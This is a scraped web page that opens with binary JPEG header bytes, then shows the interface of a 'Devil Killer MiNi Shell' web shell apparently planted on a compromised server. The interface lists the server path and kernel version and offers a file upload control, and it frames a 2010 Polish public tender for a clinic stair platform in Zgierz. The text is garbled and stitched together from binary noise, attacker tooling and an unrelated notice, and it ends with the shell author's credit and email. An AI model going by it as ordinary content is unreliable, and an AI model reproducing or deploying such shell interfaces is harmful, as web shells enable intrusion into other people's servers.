JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100114/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100114/12116-N-2010.html

<p class="kh_header"><b>Zgierz: Dostawa i montaż platformy schodowej wewnetrznej dla Miejskiego Zespołu Przychodni Rejonowych w Zgierzu w ramach realizacji obszaru B programu PFRON pn. Wyrównywanie różnic między regionami II</b><br>
<b>Numer ogłoszenia: 12116 - 2010; data zamieszczenia: 14.01.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Zespół Przychodni Rejonowych w Zgierzu , ul. Łęczycka 24a, 95-100 Zgierz, woj. łódzkie, tel. 0-42 7164161, 7174129, faks 0-42 7174129.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> przychodnie.zgierz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa i montaż platformy schodowej wewnetrznej dla Miejskiego Zespołu Przychodni Rejonowych w Zgierzu w ramach realizacji obszaru B programu PFRON pn. Wyrównywanie różnic między regionami II.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa i montaż wewnętrznej platformy schodowej w Przychodni Rejonowej Nr 1 w Zgierzu ul. Fijałkowskiego 2.Urządzenie należy zamontować na schodach wewnętrznych łączących parter z I piętrem. Przed montażem platformy należy zdemontować istniejącą balustradę schodową i zamontować tor jezdny z jednoczesną funkcją balustrady.
Parametry techniczne urządzenia:
udźwig 225kg
ilość przystanków - 2
całkowita długość toru jezdnego - ok. 9,0m
tor jezdny z 2 zakrętami 180st. -zakręt na dolnym przystanku umożliwiający bezkolizyjne parkowanie platformy w części ciągu schodów i możliwość w przyszłości wydłużenia toru jezdnego w kierunku piwnicy oraz na półpiętrze i 1 zakrętem 90st. -zakręt do parkowania na górnym przystanku
mocowanie toru jezdnego na słupkach, przy czym ma służyć jako poręcz i barierka należy zdemontować istniejącą barierkę
system wypełnienia pomiędzy dolnym torem jezdnym, a schodami,
podest platformy (szer x dł) 800 x 1000 mm -dopuszcza się również 750 x 900mm
boczny najazd;
zasilanie jednofazowe 230V
napęd bateryjny 24V
prędkość jazdy 0,15m/s -zwalnia na zakrętach
alarm akustyczno-optyczny informujący o ruchu platformy;
kolor urządzenia i toru jezdnego standardowy RAL 7032 lub 9002-do wyboru przez Użytkownika
Urządzenie powinno posiadać certyfikat CE bądź deklarację zgodności oraz kartę gwarancyjną urządzenia. Wykonawca po zakończeniu robót dostarczy protokół odbioru i dopuszczenia do użytkowania platformy wydany przez Urząd Dozoru Technicznego.
Wykonawca dokona przeszkolenia pracowników Zamawiającego w zakresie obsługi urządzenia..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 29.81.41.00-9.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.03.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
<p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia ubiegać się mogą Wykonawcy, którzy wykażą, w sposób 
wymagany niniejszą siwz, że spełniają następujące warunki:
1) spełniają warunki udziału w postępowaniu, o których mowa w art. 22 ust. 1 
    pkt. 1 - 4 prawa zamówień publicznych,
2)  nie podlegają wykluczeniu z ubiegania się o udzielenie zamówienia publicznego
 na podstawie art. 24 prawa zamówień publicznych
3) posiadają wymagane uprawnienia do wykonywania określonej (właściwej 
dla realizacji przedmiotu niniejszego zamówienia) działalności1) lub czynności2),
 jeżeli ustawy nakładają obowiązek posiadania takich uprawnień,
4) wykonali, a w przypadku świadczeń okresowych lub ciągłych również którzy     wykonują, w okresie ostatnich 3 lat przed dniem wszczęcia postępowania 
 o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - 
w tym okresie, co najmniej .....1.. dostawy / usługi * odpowiadające swoim  
rodzajem i wartością dostawom stanowiącym przedmiot zamówienia, 
5/ zobowiązali się do wykonania zamówienia w wymaganym terminie 
6/ zaakceptowali bez zastrzeżeń wszystkie postanowienia Wzoru umowy
7/ udzielili gwarancji na okres 2  lat, licząc od daty odbioru końcowego zostały wykonane należycie.</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Wykonawcy winni złożyć następujące, niezbędne do przeprowadzenia 
postępowania,  o ś w i a d c z e n i a    lub   d o k u m e n t y,
1.Ofertę, wg załączonego druku WZP-2  
2.Oświadczenie Wykonawcy o spełnianiu warunków udziału w postępowaniu,
   wg załączonego druku WZP-3, 
3.Oświadczenie Podmiotu Składowego o spełnianiu warunków udziału w postępowaniu, wg załączonego druku WZP-3w - podpisane odrębnie przez każdy podmiot składowy 
4.Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie 
 do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają 
 wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, 
 wystawione nie wcześniej, niż 6 miesięcy przed upływem terminu składania 
 wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia 
 albo składania ofert. 
5.Wykaz dostaw / usług *, wykonanych, a w przypadku świadczeń okresowych 
lub ciągłych również wykonywanych w okresie ostatnich 3 lat przed dniem 
wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia
działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem 
i wartością dostawom stanowiącym przedmiot zamówienia z podaniem
ich wartości, przedmiotu, dat wykonania i odbiorców oraz załączeniem dokumentów 
potwierdzających, że te dostawy  zostały wykonane należycie -                - Doświadczenie zawodowe - wg załączonego druku WZP-11b.
6.Wzór umowy 
7.Pełnomocnictwo do reprezentowania w postępowaniu o udzielenie zamówienia - 
w szczególności - do podpisania oferty wraz z załącznikami - o ile nie wynika 
ono z innnych dokumentów załączonych przez Wykonawcę
8.Certyfikat CE lub deklaracja zgodności na platformę schodową.
9.Dokumenty dopuszczające platformę do użytkowania z Urzędu Dozoru Technicznego.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> przychodnie.zgierz.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> 95-100 Zgierz ul. Łęczycka 24a pok. nr 33.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.01.2010 godzina 12:00, miejsce: Miejski Zespół Przychodni Rejonowych w Zgierzu 95-100 Zgierz ul. Łęczycka 24a pok. nr 34.</p><p><b>IV.3.5) Termin związania ofertą:</b> do 24.02.2010.</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com